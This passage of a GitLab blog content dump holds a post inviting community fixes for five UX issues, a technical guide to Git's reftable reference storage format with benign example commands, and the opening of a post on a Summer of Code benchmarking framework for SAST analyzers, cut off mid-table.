page](/community/contribute/), where you can\nlearn how you can contribute to GitLab's code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to [email me](mailto:rpaik@gitlab.com).\n\n**Read more about our GitLab contributors:**\n\n[New tools make contributing to GitLab easier](/blog/13-0-contributor-experience-update/)\n\n[Community contributions in 2019](/blog/community-update-for-2019/)\n\n[What's a GitLab Hackathon _really_ like?](/blog/q4-hackathon-recap/)\n",[267,9,708],"contributors",{"slug":710,"featured":6,"template":689},"3000-contributors-post","content:en-us:blog:3000-contributors-post.yml","3000 Contributors Post","en-us/blog/3000-contributors-post.yml","en-us/blog/3000-contributors-post",{"_path":716,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":717,"content":723,"config":731,"_id":733,"_type":14,"title":734,"_source":16,"_file":735,"_stem":736,"_extension":19},"/en-us/blog/5-problems-you-can-help-us-solve-right-now",{"title":718,"description":719,"ogTitle":718,"ogDescription":719,"noIndex":6,"ogImage":720,"ogUrl":721,"ogSiteName":673,"ogType":674,"canonicalUrls":721,"schema":722},"5 UX problems you can help us fix right now","“We spent 40 hours talking to 20 of you. Now we’ve got some issues we’d like your help on.”","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682386/Blog/Hero%20Images/pexels-sevenstorm-juhaszimrus-704767.jpg","https://about.gitlab.com/blog/5-problems-you-can-help-us-solve-right-now","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"5 UX problems you can help us fix right now\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ben Leduc-Mills\"}],\n        \"datePublished\": \"2022-07-25\",\n      }",{"title":718,"description":719,"authors":724,"heroImage":720,"date":726,"body":727,"category":10,"tags":728},[725],"Ben Leduc-Mills","2022-07-25"," \n\nWe’ve all been there. You’re sailing along, being productive, and wham! Something inexplicably awful disrupts your workflow. You ask yourself, “How could _anyone_ think this was a good idea?” Maybe it’s a bug, slow performance, or bad design. One of the reasons we conduct [user experience research at GitLab](/handbook/product/ux/ux-research/) is to find these problems and report back to our teams so they can fix them. \n\n![Grumpy cat looking over computer](https://about.gitlab.com/images/blogimages/hhh13-tEMU4lzAL0w-unsplash__1_.jpg)\nWe've all been there\n{: .note.text-center}\n\nWith a product as rich and complex as GitLab, we find _a lot_ of problems. So many, in fact, we often can't fix them as fast as you find them. ([Although we do try!](/releases/2022/05/22/gitlab-15-0-released/#bug-fixes)) The great thing about GitLab is that [**everyone** can contribute](/company/mission/). This is the first in a new series of blog posts where the UX researchers at GitLab transform their findings into some great first contributions that community members can explore. \n\nWe recently spent 2 hours each with 20 people who use GitLab, going through specific tasks related to branch and merge request operations, and, predictably, we found plenty of things to work on (although this research focused on the code creation and review process) - you can check out the full report below:\n\n\u003Cfigure class=\"video_container\">\n\u003Ciframe style=\"border: 1px solid rgba(0, 0, 0, 0.1);\" width=\"800\" height=\"450\" src=\"https://www.figma.com/embed?embed_host=share&url=https%3A%2F%2Fwww.figma.com%2Fproto%2FmF555KKsf1m1UyyXbWxXu2%2FBenchmarking-Slides%3Fnode-id%3D943%253A12915%26scaling%3Dscale-down%26page-id%3D40%253A124%26starting-point-node-id%3D943%253A12915\" allowfullscreen>\u003C/iframe>\n\u003C/figure>\n\n\nWithout further ado, here are five issues we would **love** your contributions on:\n\n1. [Show more branches in the drop down menu while reverting a merge request.](https://gitlab.com/gitlab-org/gitlab/-/issues/358218) \n1. [Increase the discoverability of the insert suggestion feature.](https://gitlab.com/gitlab-org/gitlab/-/issues/368716) \n1. [Fix data loss when switching from inline to side-by-side view on MR creation page.](https://gitlab.com/gitlab-org/gitlab/-/issues/358217) \n1. [Show selected labels within the dropdown menu.](https://gitlab.com/gitlab-org/gitlab/-/issues/322945) \n1. [Improve clarity of text-only buttons -- Move 'mark as draft' onto new line](https://gitlab.com/gitlab-org/gitlab/-/issues/358437) \n\nWondering where to start? Check out [this blog post](/blog/first-time-open-source-contributor-5-things-to-get-you-started/) and [our development guide](/community/contribute/development/) and become an all-star contributor! \n\nNeed guidance or help? Feel free to leave a comment directly on one of the issues linked above, or find support in the \"get help\" section [in our contributing guide](/community/contribute/#getting-help).\n\nContributing to an open source project also brings a ton of proven benefits you might not expect:\n\n- Contributing is one of the most efficient ways to learn, as it is learning by doing and [being guided by merge request coaches](https://handbook.gitlab.com/job-families/expert/merge-request-coach/). Contributing has been proven time and time again to be the best form of learning!\n- Public exposure and explicit appreciation from the open source community, which helps build your public profile And show your expertise ... you never know when that resume might come in handy! 😊 \n- You're in for a treat: **first-time** contributors receive GitLab swag, **regular** contributors (5 MRs or more) are eligible for the [GitLab Heroes program](/community/heroes), and **top** contributors may be invited to join the [GitLab Core team](/community/core-team/).\n\nAnd not only is this beneficial for you, but also for your employer (if you are employed). Because you are growing and learning at a rapid speed from the best, you will get a faster turnaround time when integrating a feature into the platform since you know how the system works. You will get more value from the most precious resource in the universe, time 🕐. Take advantage of this experience today. We are convinced of the benefits and we hope you and/or your employer are too now. Let's aim for the moon together. 🚀 \n\n1,2,3...**let's go!**\n\nCover image by [SevenStorm JUHASZIMRUS](https://www.pexels.com/@sevenstormphotography/) on [Pexels](https://www.pexels.com/photo/123-let-s-go-imaginary-text-704767/)\n{: .note}\n",[708,267,9,729,730],"research","UX",{"slug":732,"featured":6,"template":689},"5-problems-you-can-help-us-solve-right-now","content:en-us:blog:5-problems-you-can-help-us-solve-right-now.yml","5 Problems You Can Help Us Solve Right Now","en-us/blog/5-problems-you-can-help-us-solve-right-now.yml","en-us/blog/5-problems-you-can-help-us-solve-right-now",{"_path":738,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":739,"content":745,"config":754,"_id":756,"_type":14,"title":757,"_source":16,"_file":758,"_stem":759,"_extension":19},"/en-us/blog/a-beginners-guide-to-the-git-reftable-format",{"title":740,"description":741,"ogTitle":740,"ogDescription":741,"noIndex":6,"ogImage":742,"ogUrl":743,"ogSiteName":673,"ogType":674,"canonicalUrls":743,"schema":744},"A beginner's guide to the Git reftable format","In Git 2.45.0, GitLab upstreamed the reftable backend to Git, which completely changes how references are stored. Get an in-depth look at the inner workings of this new format.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664595/Blog/Hero%20Images/blog-image-template-1800x945__9_.png","https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A beginner's guide to the Git reftable format\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Patrick Steinhardt\"}],\n        \"datePublished\": \"2024-05-30\",\n      }",{"title":740,"description":741,"authors":746,"heroImage":742,"date":748,"body":749,"category":10,"tags":750},[747],"Patrick Steinhardt","2024-05-30","Until recently, the \"files\" format was the only way for Git to store references. With the [release of Git 2.45.0](https://about.gitlab.com/blog/whats-new-in-git-2-45-0/), Git can now store references in a \"reftable\" format. This new format is a binary format that is quite a bit more complex, but that complexity allows it to address several shortcomings of the \"files\" format. The design goals for the \"reftable\" format include:\n\n- Make the lookup of a single reference and iteration through ranges of references as efficient and fast as possible.\n- Support for consistent reads of references so that Git never reads an in-between state when an update to multiple references has been applied only partially.\n- Support for atomic writes such that updating multiple references can be implemented as an all-or-nothing operation.\n- Efficient storage of both refs and the reflog.\n\nIn this article, we will go under the hood of the \"reftable\" format to see exactly how it works.\n\n## How Git stores references\n\nBefore we dive into the details of the \"reftable\" format, let's quickly recap how Git has historically stored references. If you are already familiar with this, you can skip this section.\n\nA Git repository keeps track of two important data structures:\n\n- [Objects](https://git-scm.com/book/en/v2/Git-Internals-Git-Objects), which contain the actual data of your repository. This includes commits, the directory tree structure, and the blobs that contain your source code. Objects point to each other, forming an object graph. Furthermore, each object has an object ID that uniquely identifies the object.\n\n- References, such as branches and tags, which are pointers into the object graph so that you can give objects names that are easier to remember and keep track of different tracks of your development history. For example, a repository may contain a `main` branch, which is a reference named `refs/heads/main` that points to a specific commit.\n\nReferences are stored in the reference database. Until Git 2.45.0, there was only the \"files\" database format. In this format, every reference is stored as a normal file that contains either one of the following:\n\n- A regular reference that contains the object ID of the commit it points to.\n- A symbolic reference that contains the name of another reference, similar to how a symbolic link points to another file.\n\nAt regular intervals, these references get packed into a single `packed-refs` file to make lookups more efficient.\n\nThe following examples should give an idea of how the \"files\" format operates:\n\n```shell\n$ git init .\n$ git commit --allow-empty --message \"Initial commit\"\n[main (root-commit) 6917c17] Initial commit\n\n# HEAD is a symbolic reference pointing to refs/heads/main.\n$ cat .git/HEAD\nref: refs/heads/main\n\n# refs/heads/main is a regular reference pointing to a commit.\n$ cat .git/refs/heads/main\n6917c178cfc3c50215a82cf959204e9934af24c8\n\n# git-pack-refs(1) packs these references into the packed-refs file.\n$ git pack-refs --all\n$ cat .git/packed-refs\n# pack-refs with: peeled fully-peeled sorted\n6917c178cfc3c50215a82cf959204e9934af24c8 refs/heads/main\n```\n\n## High-level structure of reftables\n\nAssuming that you've got Git 2.45.0 or newer installed, you can create a repository with the \"reftable\" format by using the `--ref-format=reftable` switch:\n\n```shell\n$ git init --ref-format=reftable .\nInitialized empty Git repository in /tmp/repo/.git/\n$ git rev-parse --show-ref-format\nreftable\n\n# Irrelevant files have been removed for ease of understanding.\n$ tree .git\n.git\n├── config\n├── HEAD\n├── index\n├── objects\n├── refs\n│   └── heads\n└── reftable\n\t├── 0x000000000001-0x000000000002-40a482a9.ref\n\t└── tables.list\n\n4 directories, 6 files\n```\n\nFirst, looking at the repository configuration, you will see it has an `extension.refstorage` key:\n\n```shell\n$ cat .git/config\n[core]\n    repositoryformatversion = 1\n    filemode = true\n    bare = false\n    logallrefupdates = true\n[extensions]\n    refstorage = reftable\n```\n\nThis configuration indicates to Git that the repository has been initialized with the \"reftable\" format and tells Git to use the \"reftable\" backend to access it.\n\nWeirdly enough, the repository still has a few files that look as if the \"files\" backend was in use:\n\n- `HEAD` would usually be a symbolic reference pointing to your currently checked-out branch. While it is not used by the \"reftable\" backend, it is required for Git clients to detect the directory as a Git repository. Therefore, when using the \"reftable\" format, `HEAD` is a stub with contents `ref: refs/heads/.invalid`.\n\n- `refs/heads` is a file with contents `this repository uses the reftable format`. Git clients that do not know about the \"reftable\" format would usually expect this path to be a directory. Consequently, creating this path as a file intentionally causes such older Git clients to fail if they tried to access the repository with the \"files\" backend.\n\nThe actual references are stored in the `reftable/` directory:\n\n```shell\n$ tree .git/reftable\n.git/reftable/\n├── 0x000000000001-0x000000000001-794bd722.ref\n└── tables.list\n\n$ cat .git/reftable/tables.list\n0x000000000001-0x000000000001-794bd722.ref\n```\n\nThere are two files here:\n\n- `0x000000000001-0x000000000001-794bd722.ref` is a table containing references and the reflog data in a binary format.\n\n- `tables.list` is, well, a list of tables. In the current state of the repository, the file contains a single line, which is the name of the table. This file tracks the current set of active tables in the \"reftable\" database and is updated whenever new tables get added to the repository.\n\nUpdating a reference creates a new table:\n\n```shell\n$ git commit --allow-empty --message \"Initial commit\"\n[main (root-commit) 1472a58] Initial commit\n\n$ tree .git/reftable\n.git/reftable/\n├── 0x000000000001-0x000000000002-eb87d12b.ref\n└── tables.list\n\n$ cat .git/reftable/tables.list\n0x000000000001-0x000000000002-eb87d12b.ref\n```\n\nAs you can see, the previous table has been replaced with a new one. Furthermore, the `tables.list` file has been updated to contain the new table.\n\n## The structure of a table\n\nAs mentioned earlier, the actual data of the reference database is contained in tables. Roughly speaking, a table is split up into multiple sections:\n\n- The \"header\" contains metadata about the table. Along with some other information, this includes the version of the format, the block size, and the hash function used by the repository (for example, SHA1 or SHA256).\n- The \"ref\" section contains your references. These records have a key that equals the reference name and point to either an object ID for regular references, or to another reference for symbolic references.\n- The \"obj\" section contains reverse mapping from object IDs to the references that point to those object IDs. These allow Git to efficiently look up which references point to a given object ID.\n- The \"log\" section contains your reflog entries. These records have a key that equals the reference name plus an index that represents the number of the log entry. Furthermore, they contain the old and new object IDs as well as the message for that reflog entry.\n- The \"footer\" contains offsets to the various sections.\n\n![long table with all the reftable sections](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675179/Blog/Content%20Images/Frame_1_-_Reftable_overview.svg)\n\nEach of the section types are structured in a similar manner. Sections contain a set of records that are sorted by each record's key. For example, when you have two ref records `refs/heads/aaaaa` and `refs/heads/bbb`, you have two ref records with these reference names as their respective keys, and `refs/heads/aaaaa` would come before `refs/heads/bbb`.\n\nFurthermore, each section is divided into blocks of a fixed length. This block length is encoded in the header and serves two purposes:\n\n- Given the start of the section as well as the block size, the reader implicitly knows where each of the blocks starts. This allows Git to easily seek into the middle of a section without reading preceding blocks, which enables binary searches over blocks to speed up the lookup of records.\n- It ensures that the reader knows how much data to read from the disk at a time. Consequently, the block size is by default set to 4KiB, which is the most common sector size for hard disks. The maximum block size is 16MB.\n\nWhen we peek into, for example, a \"ref\" section, it looks roughly like the following graphic. Note how its records are ordered lexicographically inside the blocks, but also across the blocks.\n\n![reference block uncompressed](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675179/Blog/Content%20Images/Frame_2_-_Ref_block_uncompressed.svg)\n\nEquipped with the current information, we can locate a record by using the following steps:\n\n1. Perform a binary search over the blocks by looking at the keys of their respective first records, identifying the block that must contain our record.\n\n2. Perform a linear search over the records in that block.\n\nBoth of these steps are still somewhat inefficient. If we have many blocks we may have to read logarithmically many of them in our binary search to find the desired one. And when blocks contain many records, we potentially have to read all of them during the linear search.\n\nThe \"reftable\" format has additional built-in mechanisms to address these performance concerns. We will touch on these over the next few sections.\n\n### Prefix compression\n\nAs you may have noticed, all of the record keys share the same prefix `refs/`. This is a common thing in Git:\n\n- All branches start with `refs/heads/`.\n- All tags start with `refs/tags/`.\n\nTherefore, we expect that subsequent records will most likely share a significant prefix of their key. This is a good opportunity to save some precious disk space. Because we know that most keys will share a common prefix, it makes sense to optimize for this.\n\nThe optimization uses prefix compression. Every record encodes a prefix length that tells the reader how many bytes to reuse from the key of the preceding record. If we have two records, `refs/heads/a` and `refs/heads/b`, the latter can be encoded by specifying a prefix length of 11 and then only storing the suffix `b`. The reader will then take the first 11 bytes of `refs/heads/a`, which is `refs/heads/`, and append the suffix `b` to it.\n\n![prefix compression](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675179/Blog/Content%20Images/Frame_3_-_Ref_block_prefix_compression.svg)\n\n### Restart points\n\nAs explained earlier, the best way to search for a reference in a block with our current understanding of the \"reftable\" format is to do a linear search. This is because records do not have a fixed length, so it is impossible for us to tell where records would start without scanning through the block from the beginning. Also, even if records were of fixed length, we would not be able to seek into the middle of a block because the prefix compression also requires us to read preceding records.\n\nDoing a linear search would be quite inefficient because blocks may contain hundreds or even thousands of records. To address this issue, the \"reftable\" format encodes so-called restart points into every block. Restart points are uncompressed records where the prefix compression is reset. Consequently, records at restart points always contain their full key and it becomes possible to directly seek to and read the record without having to read preceding records. These restart points are listed in the footer of each block.\n\nEquipped with this information, we can avoid performing a linear search over the block. Instead, we can now do a binary search over the restart points where we search for the first restart point with a key larger than the sought-after key. From there, it follows that the desired record must be located in the section spanning from the _preceding_ restart point to the identified one.\n\nThus, our initial procedure to look up a record (binary search for the block, linear search for the record) is now:\n\n1. Perform a binary search over the blocks, identifying the block that must contain our record.\n\n2. Perform a binary search over the restart points, identifying the sub-section of the block that must contain our record.\n\n3. Perform a linear search over the records in that sub-section.\n\n![Linear search for a record](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675179/Blog/Content%20Images/Frame_4_-_Restart_points.svg)\n\n### Indices\n\nWhile the search for records inside a block is now reasonably efficient, it's still inefficient to locate the block itself. A binary search may be reasonably performant when you have a couple of blocks, but repositories with millions of references may have hundreds or even thousands of blocks. Without any additional data structure, this would cause logarithmically many disk seeks on average.\n\nTo avoid this, every section may be followed by an index section that provides an efficient way to look up a block. Each index record holds the following information:\n\n- The location of the block that it is indexing.\n- The key of the last record of the block that it is indexing.\n\nWith three or less blocks, a binary search will always require, at most, two disk reads to find the desired target block. This is the same number of reads we would have to do with an index: one to read the index itself and one to read the desired block. Consequently, indices are only written when they would actually save some reads, which is the case with four or more indexed blocks.\n\nNow the question is: What happens when the index itself becomes so large that it spans over multiple blocks? You might have guessed it: We write another index that indexes the index. These multi-level indices really only become necessary once you have repositories with hundreds of thousands of references.\n\nEquipped with these indices, we can now make the procedure to look up records even more efficient:\n1. Determine whether there is an index by looking at the footer of the table.\n\t- If there is one, perform a binary search over the index to find the desired block. This block may point into an index block itself, in which case we need to repeat this step until we hit a record of the desired type.\n\t- Otherwise, perform a binary search over the blocks as we did before.\n2. Perform a binary search over the restart points, identifying the sub-section of the block that must contain our record.\n3. Perform a linear search over the records in that sub-section.\n\n## Multiple tables\n\nUp to this point, we have only discussed how to read a _single_ table. But as the name `tables.list` indicates, you can actually have a list of tables in your \"reftable\" database.\n\nEvery time you update a reference in your repository, a new table is written and appended to `tables.list`. Thus, you will eventually end up with multiple tables:\n\n```shell\n$ tree .git/reftable/\n.git/reftable/\n├── 0x000000000001-0x000000000007-8dcd8a77.ref\n├── 0x000000000008-0x000000000008-30e0f6f6.ref\n└── tables.list\n\n$ cat .git/reftable/tables.list\n0x000000000001-0x000000000007-8dcd8a77.ref\n0x000000000008-0x000000000008-30e0f6f6.ref\n```\n\nReading the actual state of a repository requires us to merge these multiple tables into a single virtual table.\n\nYou might be wondering: If a table is written for each reference update and the same reference is updated multiple times, how does the \"reftable\" format know the most up-to-date value of a given reference? Intuitively, one could assume the value would be the one from the newest table containing the reference.\n\nIn fact, every single record has a so-called update index that encodes the \"priority\" of a record. For example, if two ref records with the same name exist, then the one with the higher update index overrides the one with the lower update index.\n\nThese update indices are visible in the file structure above. The long hex strings (for example `0x000000000001`) are the update indices, where the left-hand side of the table name is the minimum update index contained in the table and the right-hand is the maximum update index.\n\nMerging the tables then happens via a [priority queue](https://en.wikipedia.org/wiki/Priority_queue) that is ordered by the key of the ref record as well as its update index. Assuming we want to scan through all ref records, we would:\n\n1. For every table, add its first record to the priority queue.\n\n![Adding first record to the priority queue](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675179/Blog/Content%20Images/Frame_5_-_Priority_queue_1.svg)\n\n2. Yield the head of the priority queue. Because the queue is ordered by update index, it must be the most up-to-date version. Add the next item from that table to the priority queue.\n\n![Yielding the head of the priority queue](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675179/Blog/Content%20Images/Frame_6_-_Priority_queue_2.svg)\n\n3. Drop all records from the queue that have the same name. These records are shadowed, which means that they will not be shown. For each table for which we are dropping records, add the next record to the priority queue.\n\n![Dropping all records from queue that have the same name](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675179/Blog/Content%20Images/Frame_7_-_Priority_queue_3.svg)\n\nNow we can rinse and repeat to read records for other keys.\n\nTables may contain special \"tombstone\" records that mark a record as having been deleted. This allows us to delete records without having to rewrite all tables to not contain the record anymore.\n\n### Auto-compaction\n\nWhile the idea behind the priority queue is simple enough, it would be rather inefficient to merge together hundreds or even only dozens of tables in this way. So while it is true that every update to your references appends a new table to your `tables.list` file, it is only part of the story.\n\nThe other part is auto-compaction: After a new table has been appended to the list of tables, the \"reftable\" backend checks whether some of the tables should be merged. This is done by using a simple heuristic: We check whether the list of tables forms a [geometric sequence](https://en.wikipedia.org/wiki/Geometric_progression) with the file sizes. Every table `n` must be at least twice as large as the next-most-recent table `n + 1`. If that geometric sequence is violated, the backend will compact tables so that the geometric sequence is restored.\n\nOver time, this will lead to structures that look like the following:\n\n```shell\n$ du --apparent-size .git/reftable/*\n429    .git/reftable/0x000000000001-0x00000000bd7c-d9819000.ref\n101    .git/reftable/0x00000000bd7d-0x00000000c5ac-c34b88a4.ref\n32    .git/reftable/0x00000000c5ad-0x00000000cc6c-60391f53.ref\n8    .git/reftable/0x00000000cc6d-0x00000000cdc1-61c30db1.ref\n3    .git/reftable/0x00000000cdc2-0x00000000ce67-d9b55a96.ref\n1    .git/reftable/0x00000000ce68-0x00000000ce6b-44721696.ref\n1    .git/reftable/tables.list\n```\n\nNote how for every single table, the property `size(n) > size(n+1) * 2` holds.\n\nOne of the consequences of auto-compaction is that the \"reftable\" backend maintains itself. We no longer have to run `git pack-refs` in a repository.\n\n## Want to learn more?\n\nYou should now have a good understanding of how the new \"reftable\" format works under the hood. If you want to dive even deeper into the format, you can refer to the [technical documentation](https://git-scm.com/docs/reftable) provided by the Git project.\n\n> Read our [Git 2.45.0 recap](https://about.gitlab.com/blog/whats-new-in-git-2-45-0/) to find out what else is in this version of Git.",[751,752,9,753],"git","tutorial","performance",{"slug":755,"featured":91,"template":689},"a-beginners-guide-to-the-git-reftable-format","content:en-us:blog:a-beginners-guide-to-the-git-reftable-format.yml","A Beginners Guide To The Git Reftable Format","en-us/blog/a-beginners-guide-to-the-git-reftable-format.yml","en-us/blog/a-beginners-guide-to-the-git-reftable-format",{"_path":761,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":762,"content":768,"config":781,"_id":783,"_type":14,"title":784,"_source":16,"_file":785,"_stem":786,"_extension":19},"/en-us/blog/a-benchmarking-framework-for-sast",{"title":763,"description":764,"ogTitle":763,"ogDescription":764,"noIndex":6,"ogImage":765,"ogUrl":766,"ogSiteName":673,"ogType":674,"canonicalUrls":766,"schema":767},"A Google Summer of Code project: creating a benchmarking framework for SAST","Our 2022 Google Summer of Code project helped to create a benchmarking framework for SAST.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749677267/Blog/Hero%20Images/benchmarking.png","https://about.gitlab.com/blog/a-benchmarking-framework-for-sast","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A Google Summer of Code project: creating a benchmarking framework for SAST\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Michael Henriksen\"},{\"@type\":\"Person\",\"name\":\"Martynas Krupskis\"},{\"@type\":\"Person\",\"name\":\"Mark Art\"},{\"@type\":\"Person\",\"name\":\"Dinesh Bolkensteyn\"},{\"@type\":\"Person\",\"name\":\"Isaac Dawson\"},{\"@type\":\"Person\",\"name\":\"Julian Thome\"}],\n        \"datePublished\": \"2022-09-27\",\n      }",{"title":763,"description":764,"authors":769,"heroImage":765,"date":776,"body":777,"category":10,"tags":778},[770,771,772,773,774,775],"Michael Henriksen","Martynas Krupskis","Mark Art","Dinesh Bolkensteyn","Isaac Dawson","Julian Thome","2022-09-27","In summer 2022, the [Vulnerability Research team at GitLab](/handbook/engineering/development/sec/secure/vulnerability-research/) \nlaunched the [Google Summer of Code (GSoC)](https://summerofcode.withgoogle.com/) project: \n[A benchmarking framework for SAST](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/gsoc-2022/-/issues/1).\n\nThe goal of the project was to create a benchmarking framework, which would assess the\nimpact and quality of a security analyzer or configuration change before it reaches the production environment.\n\n## Preliminaries \n\n### GitLab SAST\n\nAs a complete DevOps Platform, GitLab has a variety of integrated [static analysis (SAST) tools](/direction/secure/static-analysis/sast/) \nfor different languages and frameworks. These tools help developers find\nvulnerabilities as early as possible in the software development lifecycle.\nThese tools are constantly being updated, either by upgrading the underlying\nsecurity analyzers or by applying configuration changes.\n\nSince all the integrated SAST tools are very different in terms of\nimplementation, and depend on different tech stacks, they are all\nwrapped in Docker images. The wrappers translate tool-native vulnerability\nreports to a [generic, common report format](https://docs.gitlab.com/ee/user/application_security/sast/#reports-json-format) which is\nmade available by means of the `gl-sast-report.json` artifact. This generic\nreport is GitLab's common interface between analyzers and the GitLab Rails\nbackend.\n\nBenchmarking is important to assess the efficacy of analyzers and helps to make\ndata-driven decisions. For example, benchmarking is useful for QA testing\n(spotting regressions), for data-driven decision making, and for research by\nassessing the progression of the GitLab security feature performance over time.\n\n### Google Summer Of Code (GSoC)\n\n[Google Summer of Code (GSoC)](https://summerofcode.withgoogle.com/) \nis a 10-week program that enlists contributors to work on open source projects\nin collaboration with open source organizations. For GSoC 2022, GitLab offered\nfour projects to GSoC contributors. The contributors completed each of the\nprojects with the guidance from GitLab team members who mentored them and\nprovided regular feedback and assistance when needed.\n\n### Terms & Notation\n\nIn this blog post, we use the terms/acronyms below to classify findings reported by security analyzers.\n\n| Acronym   | Meaning        | Description                                                        |\n|-------|----------------|--------------------------------------------------------------------|\n| _TP_  | True Positive  | Analyzer correctly identifies a vulnerability.                     |\n| _FP_  | False Positive | Analyzer misidentifies a vulnerability or reported a vulnerability where none exist. |\n| _TN_  | True Negative  | Analyzer correctly ignores a potential false positive.             |\n| _FN_  | False Negative | Analyzer does not report a known vulnerability.                    |\n\nFor the figures in the blog post we use the following notation: processes are\ndepicted as rounded boxes, whereas artifacts (e.g., files) are depicted as\nboxes; arrows denote an input/output (IO) relationship between the connected nodes.\n\n``` mermaid\nflowchart TB;\nsubgraph legend[ Legend ]\n   proc(Process);\n   art[Artifact];\n   proc -->|IO relation|art;\nend\n``` \n\n## Motivation\n\nThe authors of the paper [How to Build a Benchmark](https://dl.acm.org/doi/10.1145/2668930.2688819) distilled the desirable characteristics of a benchmark below:\n> 1. Relevance: How closely the benchmark behavior correlates to behaviors that are of interest to consumers of the results.\n> 2. Reproducibility: The ability to consistently produce similar results when the benchmark is run with the same test configuration.\n> 3. Fairness: Allowing different test configurations to compete on their merits without artificial limitations.\n> 4. Verifiability: Providing confidence that a benchmark result is accurate.\n> 5. Usability: Avoiding roadblocks for users to run the benchmark in their test environments.\n\nThere currently is no standard nor de facto language-agnostic SAST benchmark\nsatisfying all the criteria mentioned above. Many benchmark suites focus on\nspecific languages, are shipped with incomplete or missing ground-truths, or\nare based on outdated technologies and/or frameworks. A ground-truth or\nbaseline is the set of findings a SAST tool is expected to detect.\n\nThe main objective of the GSoC project was to close this gap and start to\ncreate a benchmarking framework that addresses all the desirable charateristics\nmentioned above in the following manner:\n\n1. Relevance: Include realistic applications (in terms of size, framework usage\n   and customer demand).\n2. Reproducibility: Automate the whole benchmarking process in CI.\n3. Fairness: Make it easy to integrate new SAST tools by just tweaking the CI\n   configuration and use the [GitLab security report schema](https://docs.gitlab.com/ee/user/application_security/sast/#reports-json-format) as a common standard.\n4. Verifiability: Assemble baseline that includes all the relevant\n   vulnerabilities and make it publicly available. The baseline is the north star\n   that defines what vulnerabilities are actually included in a test application. \n5. Usability: Benchmark users can just integrate the benchmark as a downstream\n   pipeline to their CI configuration.\n\n## A benchmarking framework for SAST\n\nThe benchmarking framework compares the efficacy of an analyzer against a known\nbaseline. This is very useful for monitoring the efficacy of the analyzer that\nparticipates in the benchmarking. The baseline is the gold standard that serves\nas a compass to guide analyzer improvements.\n\n### Usage\n\nFor using the framework, the following requirements have to be met:\n1. The analyzer has to be dockerized.\n1. The analyzer has to produce a vulnerability report that adheres to the\n   [GitLab security report schema](https://docs.gitlab.com/ee/user/application_security/sast/#reports-json-format)\n   format, which serves as our generic intermediate representation to compare\n   analyzer efficacy. \n1. The baseline expectations have to be provided as \n   [GitLab security report schema](https://docs.gitlab.com/ee/user/application_security/sast/#reports-json-format)\n   so that we can compare the analyzer output against it. \n\nThe framework is designed in such a way that it can be easily integrated into\nthe CI configuration of existing GitLab projects by means of a [downstream pipeline](https://docs.gitlab.com/ee/ci/pipelines/downstream_pipelines.html).\nThere are many possible ways in which a downstream pipeline can be triggered:\nsource code changes applied to an analyzer, configuration changes\napplied to an analyzer, or scheduled pipeline invocation. By using the pipeline,\nwe can run the benchmarking frameworks continuously and instantaneously on the GitLab\nprojects that host the source code of the integrated analyzers whenever code or\nconfiguration changes are applied. \n\n### Architecture \n\nThe figure below depicts the benchmarking framework when comparing an analyzer\nagainst a baseline.\n\nWe assume that we have a baseline configuration available; a baseline consists\nof an application that is an actual test application that includes\nvulnerabilities. These vulnerabilities are documented in an expectation file\nthat adheres to the [security report schema](https://docs.gitlab.com/ee/user/application_security/sast/#reports-json-format).\n\nNote that we use the terms baseline and expectation interchangeably. As\nmentioned earlier, the benchmarking framework is essentially a GitLab pipeline\nthat can be triggered downstream. The configured analyzer then takes the\nbaseline app as input and generates a `gl-sast-report.json` file. The heart of the\nbenchmarking framework is the `compare` step, which compares the baseline\nagainst the report generated by the analyzer, both of which adhere to the\n[security report schema](https://docs.gitlab.com/ee/user/application_security/sast/#reports-json-format).\n\nThe compare step also computes the _TP_, _FN_ and _FP_ that have been reported by the\nanalyzer and computes different metrics based on this information. The compare\nstep is implemented in the\n[evaluator tool](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/evaluator). \n\n``` mermaid\nflowchart LR;\nsbx[gl-sast-report.json];\nbreport[Report];\nconfig[Configuration];\n\nconfig --> bf;\n\nsubgraph Baseline\n  bcollection[app];\n  baseline[expectation];\nend\n\nsubgraph bf [ Benchmarking Framework ]\n   orig(Analyzer);\n   compare(Compare);\n   orig --> sbx;\n   sbx --> compare;\nend\n\nbaseline --> compare;\ncompare --> breport\nbcollection --> orig\n```\n\nUsing the security report format as a common standard makes the benchmarking\nframework very versatile: the baseline could be provided by an automated\nprocess, by another analyzer, or manually, which happened to be the case in this\nGSoC project.\n\n### Scoring\n\nThe main functionality of the [evaluator tool](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/evaluator)\nis to compute the overlap/intersection, and difference between a baseline and\ngenerated report in order to uncover true positives, false positives, and false\nnegatives. \n\nThe relationship between _TP_, _FP_, _FN_, _TN_, baseline, and generated report can be\nseen in the table below; it includes three columns `analyzer`, `baseline` and\n`classification`. The column `analyzer` represents the findings included in the\nreport generated by the analyzer; column `baseline` represents the findings\nincluded in the baseline; column `classification` denotes the\nverdict/classification that the [evaluator tool](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/evaluator)\nattaches to the analyzer finding when performing the comparison. The `X` and\n`-` denote reported and non-reported findings, respectively.\n\n| analyzer | baseline | classification |\n| -------- | -------  | -------------  |\n| -        | -        | 